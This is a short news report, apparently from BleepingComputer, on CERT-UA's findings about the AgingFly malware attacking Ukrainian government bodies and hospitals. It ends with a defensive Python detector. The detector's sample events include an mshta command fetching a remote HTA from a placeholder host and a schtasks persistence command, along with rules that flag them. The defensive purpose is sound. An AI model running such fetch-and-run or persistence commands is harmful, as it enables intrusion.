Cyber: New AgingFly malware used in attacks on Ukraine govt, hospitals - Complete Guide

A new malware family named 'AgingFly' has been identified in attacks against local governments and hospitals; the malware steals authentication data from Chromium-based browsers and the WhatsApp messenger. The attacks were spotted in Ukraine by the country's CERT team last month. Based on the forensic evidence, targets may also include representatives of the Defense Forces. CERT-UA has attributed the attacks to a cyber threat cluster it tracks as UAC-0247.

According to the Ukrainian agency, the attack begins with the target receiving an email purporting to be a humanitarian aid offer, which encourages them to click an embedded link. The link redirects either to a legitimate site that had been compromised via a cross-site scripting (XSS) vulnerability or to a fake site generated with an AI tool. CERT-UA says the target then receives an archive containing a shortcut file (LNK) that launches the built-in HTA handler, which in turn connects to a remote resource to retrieve and execute an HTA file. The HTA displays a decoy form to divert attention and creates a scheduled task that downloads and runs an EXE payload; that payload injects shellcode into a legitimate process. Next, the attackers deploy a two-stage loader in which the second stage uses a custom executable format, and the final payload is compressed and encrypted.
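The two observable steps in the chain above (the HTA handler pulling its script from a remote URL, and a scheduled task being registered by that handler) can be checked in process-creation telemetry. The following is an added example written for this page, not code from CERT-UA or BleepingComputer; it assumes the HTA handler is Windows' mshta.exe and that the task is registered through schtasks.exe, and it runs over a few constructed, simplified Sysmon-style events.

```python
import re

# Constructed sample process-creation events (simplified Sysmon-style fields).
# They mirror the chain described above: the LNK launches the HTA handler
# (assumed to be mshta.exe; the page only says "built-in HTA handler"), which
# fetches a remote HTA, which then registers a scheduled task (assumed here to
# go through schtasks.exe). Hostnames, paths and PIDs are all made up.
SAMPLE_EVENTS = [
    {"pid": 4100, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe", "parent_image": r"C:\Windows\System32\userinit.exe"},
    {"pid": 4212, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://example.invalid/aid/form.hta",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 4300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /tn Updater /tr "C:\Users\Public\u.exe" /sc minute /mo 5',
     "parent_image": r"C:\Windows\System32\mshta.exe"},
    # Benign control: a locally installed HTA, which should not be flagged.
    {"pid": 4400, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Program Files\Vendor\help.hta",
     "parent_image": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule_name) hits for the two behaviours in the chain."""
    hits = []
    for ev in events:
        image = basename(ev["image"])
        parent = basename(ev.get("parent_image", ""))
        cmd = ev["cmd"]
        # Rule 1: the HTA handler retrieving its script from a remote resource.
        if image == "mshta.exe" and URL_RE.search(cmd):
            hits.append((ev["pid"], "mshta_remote_hta"))
        # Rule 2: scheduled-task creation whose parent is the HTA handler.
        if image == "schtasks.exe" and parent == "mshta.exe" and "/create" in cmd.lower():
            hits.append((ev["pid"], "schtasks_create_from_mshta"))
    return hits


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Rule 2 will miss tasks registered through the Task Scheduler COM API rather than schtasks.exe, so in production pair it with task-registration events (for example Windows event ID 4698) where those are collected.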

Source: BleepingComputer